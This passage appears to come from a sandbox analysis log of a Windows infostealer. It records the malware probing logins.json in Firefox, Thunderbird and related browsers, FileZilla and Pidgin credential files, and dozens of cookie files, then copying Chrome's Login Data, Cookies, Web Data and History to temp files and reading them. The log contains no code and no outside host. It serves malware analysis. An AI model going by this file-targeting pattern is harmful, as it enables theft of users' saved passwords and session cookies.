Create C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\Cookies\Low\\5p5nrgjn0js_halpmcxz@www.linkedin[1].txt desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_ARCHIVE, FILE_ATTRIBUTE_NOT_CONTENT_INDEXED, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\Cookies\Low\\5p5nrgjn0js_halpmcxz@www.msn[2].txt desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_ARCHIVE, FILE_ATTRIBUTE_NOT_CONTENT_INDEXED, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\Cookies\Low\\5p5nrgjn0js_halpmcxz@www.msn[2].txt desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_ARCHIVE, FILE_ATTRIBUTE_NOT_CONTENT_INDEXED, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Microsoft\Windows\INetCache\\ desired_access = GENERIC_READ, file_attributes = INVALID_FILE_ATTRIBUTES, share_mode = FILE_SHARE_READ False 2
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Microsoft\Windows\INetCache\\ desired_access = GENERIC_READ, file_attributes = INVALID_FILE_ATTRIBUTES, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE False 2
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\INetCookies\\ desired_access = GENERIC_READ, file_attributes = INVALID_FILE_ATTRIBUTES, share_mode = FILE_SHARE_READ False 2
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\INetCookies\\ desired_access = GENERIC_READ, file_attributes = INVALID_FILE_ATTRIBUTES, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE False 2
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\#!001\MicrosoftEdge\Cookies\\ desired_access = GENERIC_READ, file_attributes = INVALID_FILE_ATTRIBUTES, share_mode = FILE_SHARE_READ False 2
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\#!001\MicrosoftEdge\Cookies\\ desired_access = GENERIC_READ, file_attributes = INVALID_FILE_ATTRIBUTES, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE False 2
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\#!002\MicrosoftEdge\Cookies\\ desired_access = GENERIC_READ, file_attributes = INVALID_FILE_ATTRIBUTES, share_mode = FILE_SHARE_READ False 2
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\#!002\MicrosoftEdge\Cookies\\ desired_access = GENERIC_READ, file_attributes = INVALID_FILE_ATTRIBUTES, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE False 2
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\MicrosoftEdge\Cookies\\ desired_access = GENERIC_READ, file_attributes = INVALID_FILE_ATTRIBUTES, share_mode = FILE_SHARE_READ False 2
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\MicrosoftEdge\Cookies\\ desired_access = GENERIC_READ, file_attributes = INVALID_FILE_ATTRIBUTES, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE False 2
Fn
Create C:\Users\5P5NRG~1\AppData\Local\Temp\1286381410344337375584.tmp desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
Create C:\Users\5P5NRG~1\AppData\Local\Temp\128700944028049442936.tmp desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
Create C:\Users\5P5NRG~1\AppData\Local\Temp\128700944028049442936.tmp-wal desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
Create C:\Users\5P5NRG~1\AppData\Local\Temp\128700944028049442936.tmp-shm desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
Create C:\Users\5P5NRG~1\AppData\Local\Temp\1287786455599953165632.tmp desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
Create C:\Users\5P5NRG~1\AppData\Local\Temp\128841915454776882581.tmp desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
Create C:\Users\5P5NRG~1\AppData\Local\Temp\1288564556688256449469.tmp desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
Create Directory C:\Users\5P5NRG~1\AppData\Local\Temp\FF335045\ - True 1
Fn
Get Info STD_ERROR_HANDLE type = size, size_out = 8383776169708 False 249
Fn
Get Info C:\Users\5P5NRG~1\AppData\Local\Temp\FF335045\nss3.dll type = file_attributes True 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Mozilla\Firefox\Profiles\.\logins.json type = file_attributes False 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Mozilla\Firefox\Profiles\..\logins.json type = file_attributes False 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Mozilla\Firefox\Profiles\silmbjec.default\logins.json type = file_attributes False 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Thunderbird\Profiles\\logins.json type = file_attributes False 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Waterfox\Profiles\\logins.json type = file_attributes False 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Comodo\IceDragon\Profiles\\logins.json type = file_attributes False 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\8pecxstudios\Cyberfox\Profiles\\logins.json type = file_attributes False 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Moonchild Productions\Pale Moon\Profiles\\logins.json type = file_attributes False 1
Fn
Get Info C:\Users\5P5NRG~1\AppData\Local\Temp\1266573240679662425370.tmp type = file_attributes True 1
Fn
Get Info C:\Users\5P5NRG~1\AppData\Local\Temp\1266573240679662425370.tmp-journal type = file_attributes False 2
Fn
Get Info C:\Users\5P5NRG~1\AppData\Local\Temp\1266573240679662425370.tmp-wal type = file_attributes False 2
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\filezilla\recentservers.xml type = file_attributes False 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\.purple\accounts.xml type = file_attributes False 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\Cookies\\5p5nrgjn0js_halpmcxz@adobe[1].txt type = size, size_out = 0 True 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\Cookies\\5p5nrgjn0js_halpmcxz@adobe[3].txt type = size, size_out = 0 True 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\Cookies\\5p5nrgjn0js_halpmcxz@demdex[1].txt type = size, size_out = 0 True 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\Cookies\\5p5nrgjn0js_halpmcxz@dpm.demdex[2].txt type = size, size_out = 0 True 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\Cookies\\5p5nrgjn0js_halpmcxz@everesttech[1].txt type = size, size_out = 0 True 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\Cookies\\5p5nrgjn0js_halpmcxz@google[2].txt type = size, size_out = 0 True 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\Cookies\\5p5nrgjn0js_halpmcxz@ml314[1].txt type = size, size_out = 0 True 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\Cookies\\5p5nrgjn0js_halpmcxz@rlcdn[2].txt type = size, size_out = 0 True 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\Cookies\\5p5nrgjn0js_halpmcxz@rlcdn[2].txt type = size, size_out = 0 True 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\Cookies\Low\\5p5nrgjn0js_halpmcxz@ad13.adfarm1.adition[1].txt type = size, size_out = 0 True 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\Cookies\Low\\5p5nrgjn0js_halpmcxz@adfarm1.adition[2].txt type = size, size_out = 0 True 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\Cookies\Low\\5p5nrgjn0js_halpmcxz@adformdsp[1].txt type = size, size_out = 0 True 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\Cookies\Low\\5p5nrgjn0js_halpmcxz@adform[1].txt type = size, size_out = 0 True 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\Cookies\Low\\5p5nrgjn0js_halpmcxz@adnxs[1].txt type = size, size_out = 0 True 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\Cookies\Low\\5p5nrgjn0js_halpmcxz@adtech[2].txt type = size, size_out = 0 True 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\Cookies\Low\\5p5nrgjn0js_halpmcxz@adtr02[1].txt type = size, size_out = 0 True 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\Cookies\Low\\5p5nrgjn0js_halpmcxz@advertising[1].txt type = size, size_out = 0 True 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\Cookies\Low\\5p5nrgjn0js_halpmcxz@api.bing[2].txt type = size, size_out = 0 True 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\Cookies\Low\\5p5nrgjn0js_halpmcxz@at.atwola[1].txt type = size, size_out = 0 True 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\Cookies\Low\\5p5nrgjn0js_halpmcxz@bing[1].txt type = size, size_out = 0 True 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\Cookies\Low\\5p5nrgjn0js_halpmcxz@c.bing[1].txt type = size, size_out = 0 True 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\Cookies\Low\\5p5nrgjn0js_halpmcxz@c.msn[1].txt type = size, size_out = 0 True 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\Cookies\Low\\5p5nrgjn0js_halpmcxz@doubleclick[2].txt type = size, size_out = 0 True 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\Cookies\Low\\5p5nrgjn0js_halpmcxz@google[1].txt type = size, size_out = 0 True 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\Cookies\Low\\5p5nrgjn0js_halpmcxz@google[3].txt type = size, size_out = 0 True 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\Cookies\Low\\5p5nrgjn0js_halpmcxz@google[4].txt type = size, size_out = 0 True 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\Cookies\Low\\5p5nrgjn0js_halpmcxz@linkedin[1].txt type = size, size_out = 0 True 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\Cookies\Low\\5p5nrgjn0js_halpmcxz@m.exactag[1].txt type = size, size_out = 0 True 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\Cookies\Low\\5p5nrgjn0js_halpmcxz@msn[1].txt type = size, size_out = 0 True 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\Cookies\Low\\5p5nrgjn0js_halpmcxz@scorecardresearch[2].txt type = size, size_out = 0 True 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\Cookies\Low\\5p5nrgjn0js_halpmcxz@server.adformdsp[1].txt type = size, size_out = 0 True 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\Cookies\Low\\5p5nrgjn0js_halpmcxz@skadtec[1].txt type = size, size_out = 0 True 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\Cookies\Low\\5p5nrgjn0js_halpmcxz@track.adform[2].txt type = size, size_out = 0 True 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\Cookies\Low\\5p5nrgjn0js_halpmcxz@www.bing[2].txt type = size, size_out = 0 True 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\Cookies\Low\\5p5nrgjn0js_halpmcxz@www.linkedin[1].txt type = size, size_out = 0 True 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\Cookies\Low\\5p5nrgjn0js_halpmcxz@www.msn[2].txt type = size, size_out = 0 True 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\Cookies\Low\\5p5nrgjn0js_halpmcxz@www.msn[2].txt type = size, size_out = 0 True 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Microsoft\Windows\INetCache\\ type = file_attributes False 2
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\INetCookies\\ type = file_attributes False 2
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\#!001\MicrosoftEdge\Cookies\\ type = file_attributes False 2
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\#!002\MicrosoftEdge\Cookies\\ type = file_attributes False 2
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\MicrosoftEdge\Cookies\\ type = file_attributes False 2
Fn
Get Info C:\Users\5P5NRG~1\AppData\Local\Temp\1286381410344337375584.tmp type = file_attributes True 1
Fn
Get Info C:\Users\5P5NRG~1\AppData\Local\Temp\1286381410344337375584.tmp-journal type = file_attributes False 2
Fn
Get Info C:\Users\5P5NRG~1\AppData\Local\Temp\1286381410344337375584.tmp-wal type = file_attributes False 2
Fn
Get Info C:\Users\5P5NRG~1\AppData\Local\Temp\128700944028049442936.tmp type = file_attributes True 1
Fn
Get Info C:\Users\5P5NRG~1\AppData\Local\Temp\128700944028049442936.tmp-journal type = file_attributes False 1
Fn
Get Info C:\Users\5P5NRG~1\AppData\Local\Temp\128700944028049442936.tmp-wal type = file_attributes False 2
Fn
Get Info C:\Users\5P5NRG~1\AppData\Local\Temp\128700944028049442936.tmp-shm type = file_attributes False 1
Fn
Get Info C:\Users\5P5NRG~1\AppData\Local\Temp\1287786455599953165632.tmp type = file_attributes True 1
Fn
Get Info C:\Users\5P5NRG~1\AppData\Local\Temp\1287786455599953165632.tmp-journal type = file_attributes False 2
Fn
Get Info C:\Users\5P5NRG~1\AppData\Local\Temp\1287786455599953165632.tmp-wal type = file_attributes False 2
Fn
Get Info C:\Users\5P5NRG~1\AppData\Local\Temp\128841915454776882581.tmp type = file_attributes True 1
Fn
Get Info C:\Users\5P5NRG~1\AppData\Local\Temp\128841915454776882581.tmp-journal type = file_attributes False 2
Fn
Get Info C:\Users\5P5NRG~1\AppData\Local\Temp\128841915454776882581.tmp-wal type = file_attributes False 2
Fn
Get Info C:\Users\5P5NRG~1\AppData\Local\Temp\1288564556688256449469.tmp type = file_attributes True 1
Fn
Get Info C:\Users\5P5NRG~1\AppData\Local\Temp\1288564556688256449469.tmp-journal type = file_attributes False 2
Fn
Get Info C:\Users\5P5NRG~1\AppData\Local\Temp\1288564556688256449469.tmp-wal type = file_attributes False 2
Fn
Open STD_INPUT_HANDLE - True 2
Fn
Open STD_OUTPUT_HANDLE - True 2
Fn
Open STD_ERROR_HANDLE - True 2
Fn
Copy C:\Users\5P5NRG~1\AppData\Local\Temp\1266573240679662425370.tmp source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Google\Chrome\User Data\Default\Login Data True 1
Fn
Copy C:\Users\5P5NRG~1\AppData\Local\Temp\1286381410344337375584.tmp source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Google\Chrome\User Data\Default\Cookies True 1
Fn
Copy C:\Users\5P5NRG~1\AppData\Local\Temp\128700944028049442936.tmp source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Mozilla\Firefox\Profiles\silmbjec.default\cookies.sqlite True 1
Fn
Copy C:\Users\5P5NRG~1\AppData\Local\Temp\1287786455599953165632.tmp source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Google\Chrome\User Data\Default\Web Data True 1
Fn
Copy C:\Users\5P5NRG~1\AppData\Local\Temp\128841915454776882581.tmp source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Google\Chrome\User Data\Default\Web Data True 1
Fn
Copy C:\Users\5P5NRG~1\AppData\Local\Temp\1288564556688256449469.tmp source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Google\Chrome\User Data\Default\History True 1
Fn
Read C:\Users\5P5NRG~1\AppData\Local\Temp\1266573240679662425370.tmp size = 100, size_out = 100 True 1
Fn
Data
Read C:\Users\5P5NRG~1\AppData\Local\Temp\1266573240679662425370.tmp size = 2048, size_out = 2048 True 2
Fn
Data
Read C:\Users\5P5NRG~1\AppData\Local\Temp\1266573240679662425370.tmp size = 16, size_out = 16 True 1
Fn
Data
Read C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\Cookies\\5p5nrgjn0js_halpmcxz@adobe[1].txt size = 83, size_out = 83 True 1
Fn
Data
Read C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\Cookies\\5p5nrgjn0js_halpmcxz@adobe[3].txt size = 551, size_out = 551 True 1
Fn
Data
Read C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\Cookies\\5p5nrgjn0js_halpmcxz@demdex[1].txt size = 241, size_out = 241 True 1
Fn
Data
Read C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\Cookies\\5p5nrgjn0js_halpmcxz@dpm.demdex[2].txt size = 111, size_out = 111 True 1
Fn
Data
Read C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\Cookies\\5p5nrgjn0js_halpmcxz@everesttech[1].txt size = 110, size_out = 110 True 1
Fn
Data
Read C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\Cookies\\5p5nrgjn0js_halpmcxz@google[2].txt size = 276, size_out = 276 True 1
Fn
Data
Read C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\Cookies\\5p5nrgjn0js_halpmcxz@ml314[1].txt size = 86, size_out = 86 True 1
Fn
Data
Read C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\Cookies\\5p5nrgjn0js_halpmcxz@rlcdn[2].txt size = 414, size_out = 414 True 1
Fn
Data
Read C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\Cookies\\5p5nrgjn0js_halpmcxz@rlcdn[2].txt size = 414, size_out = 414 True 1
Fn
Data
Read C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\Cookies\Low\\5p5nrgjn0js_halpmcxz@ad13.adfarm1.adition[1].txt size = 102, size_out = 102 True 1
Fn
Data
Read C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\Cookies\Low\\5p5nrgjn0js_halpmcxz@adfarm1.adition[2].txt size = 102, size_out = 102 True 1
Fn
Data
Read C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\Cookies\Low\\5p5nrgjn0js_halpmcxz@adformdsp[1].txt size = 93, size_out = 93 True 1
Fn
Data
Read C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\Cookies\Low\\5p5nrgjn0js_halpmcxz@adform[1].txt size = 234, size_out = 234 True 1
Fn
Data
Read C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\Cookies\Low\\5p5nrgjn0js_halpmcxz@adnxs[1].txt size = 578, size_out = 578 True 1
Fn
Data
Read C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\Cookies\Low\\5p5nrgjn0js_halpmcxz@adtech[2].txt size = 101, size_out = 101 True 1
Fn
Data
Read C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\Cookies\Low\\5p5nrgjn0js_halpmcxz@adtr02[1].txt size = 82, size_out = 82 True 1
Fn
Data
Read C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\Cookies\Low\\5p5nrgjn0js_halpmcxz@advertising[1].txt size = 293, size_out = 293 True 1
Fn
Data
Read C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\Cookies\Low\\5p5nrgjn0js_halpmcxz@api.bing[2].txt size = 221, size_out = 221 True 1
Fn
Data
Read C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\Cookies\Low\\5p5nrgjn0js_halpmcxz@at.atwola[1].txt size = 513, size_out = 513 True 1
Fn
Data
Read C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\Cookies\Low\\5p5nrgjn0js_halpmcxz@bing[1].txt size = 490, size_out = 490 True 1
Fn
Data
Read C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\Cookies\Low\\5p5nrgjn0js_halpmcxz@c.bing[1].txt size = 456, size_out = 456 True 1
Fn
Data
Read C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\Cookies\Low\\5p5nrgjn0js_halpmcxz@c.msn[1].txt size = 130, size_out = 130 True 1
Fn
Data
Read C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\Cookies\Low\\5p5nrgjn0js_halpmcxz@doubleclick[2].txt size = 272, size_out = 272 True 1
Fn
Data
Read C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\Cookies\Low\\5p5nrgjn0js_halpmcxz@google[1].txt size = 598, size_out = 598 True 1
Fn
Data
Read C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\Cookies\Low\\5p5nrgjn0js_halpmcxz@google[3].txt size = 196, size_out = 196 True 1
Fn
Data
Read C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\Cookies\Low\\5p5nrgjn0js_halpmcxz@google[4].txt size = 543, size_out = 543 True 1
Fn
Data
Read C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\Cookies\Low\\5p5nrgjn0js_halpmcxz@linkedin[1].txt size = 272, size_out = 272 True 1
Fn
Data
Read C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\Cookies\Low\\5p5nrgjn0js_halpmcxz@m.exactag[1].txt size = 118, size_out = 118 True 1
Fn
Data
Read C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\Cookies\Low\\5p5nrgjn0js_halpmcxz@msn[1].txt size = 823, size_out = 823 True 1
Fn
Data
Read C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\Cookies\Low\\5p5nrgjn0js_halpmcxz@scorecardresearch[2].txt size = 206, size_out = 206 True 1
Fn
Data
Read C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\Cookies\Low\\5p5nrgjn0js_halpmcxz@server.adformdsp[1].txt size = 108, size_out = 108 True 1
Fn
Data
Read C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\Cookies\Low\\5p5nrgjn0js_halpmcxz@skadtec[1].txt size = 104, size_out = 104 True 1
Fn
Data
Read C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\Cookies\Low\\5p5nrgjn0js_halpmcxz@track.adform[2].txt size = 178, size_out = 178 True 1
Fn
Data
Read C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\Cookies\Low\\5p5nrgjn0js_halpmcxz@www.bing[2].txt size = 215, size_out = 215 True 1
Fn
Data
Read C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\Cookies\Low\\5p5nrgjn0js_halpmcxz@www.linkedin[1].txt size = 169, size_out = 169 True 1
Fn
Data
Read C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\Cookies\Low\\5p5nrgjn0js_halpmcxz@www.msn[2].txt size = 1026, size_out = 1026 True 1
Fn
Data
Read C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\Cookies\Low\\5p5nrgjn0js_halpmcxz@www.msn[2].txt size = 1026, size_out = 1026 True 1
Fn
Data
Read C:\Users\5P5NRG~1\AppData\Local\Temp\1286381410344337375584.tmp size = 100, size_out = 100 True 1
Fn
Data
Read C:\Users\5P5NRG~1\AppData\Local\Temp\1286381410344337375584.tmp size = 1024, size_out = 1024 True 2
Fn
Data
Read C:\Users\5P5NRG~1\AppData\Local\Temp\1286381410344337375584.tmp size = 16, size_out = 16 True 1
Fn
Data
Read C:\Users\5P5NRG~1\AppData\Local\Temp\128700944028049442936.tmp size = 100, size_out = 100 True 1
Fn
Data
Read C:\Users\5P5NRG~1\AppData\Local\Temp\128700944028049442936.tmp size = 32768, size_out = 32768 True 3
Fn
Data
Read C:\Users\5P5NRG~1\AppData\Local\Temp\1287786455599953165632.tmp size = 100, size_out = 100 True 1
Fn
Data
Read C:\Users\5P5NRG~1\AppData\Local\Temp\1287786455599953165632.tmp size = 2048, size_out = 2048 True 5
Fn
Data
Read C:\Users\5P5NRG~1\AppData\Local\Temp\1287786455599953165632.tmp size = 16, size_out = 16 True 1
Fn
Data
Read C:\Users\5P5NRG~1\AppData\Local\Temp\128841915454776882581.tmp size = 100, size_out = 100 True 1
Fn
Data
Read C:\Users\5P5NRG~1\AppData\Local\Temp\128841915454776882581.tmp size = 2048, size_out = 2048 True 5
Fn
Data
Read C:\Users\5P5NRG~1\AppData\Local\Temp\128841915454776882581.tmp size = 16, size_out = 16 True 1
Fn
Data
Read C:\Users\5P5NRG~1\AppData\Local\Temp\1288564556688256449469.tmp size = 100, size_out = 100 True 1
Fn
Data
Read C:\Users\5P5NRG~1\AppData\Local\Temp\1288564556688256449469.tmp size = 4096, size_out = 4096 True 4
Fn
Data
Read C:\Users\5P5NRG~1\AppData\Local\Temp\1288564556688256449469.tmp size = 16, size_out = 16 True 1
Fn
Data
Write C:\Users\5P5NRG~1\AppData\Local\Temp\FF335045\/api-ms-win-core-console-l1-1-0.dll size = 18744 True 1
Fn
Data
Write C:\Users\5P5NRG~1\AppData\Local\Temp\FF335045\/api-ms-win-core-datetime-l1-1-0.dll size = 18232 True 1
Fn
Data
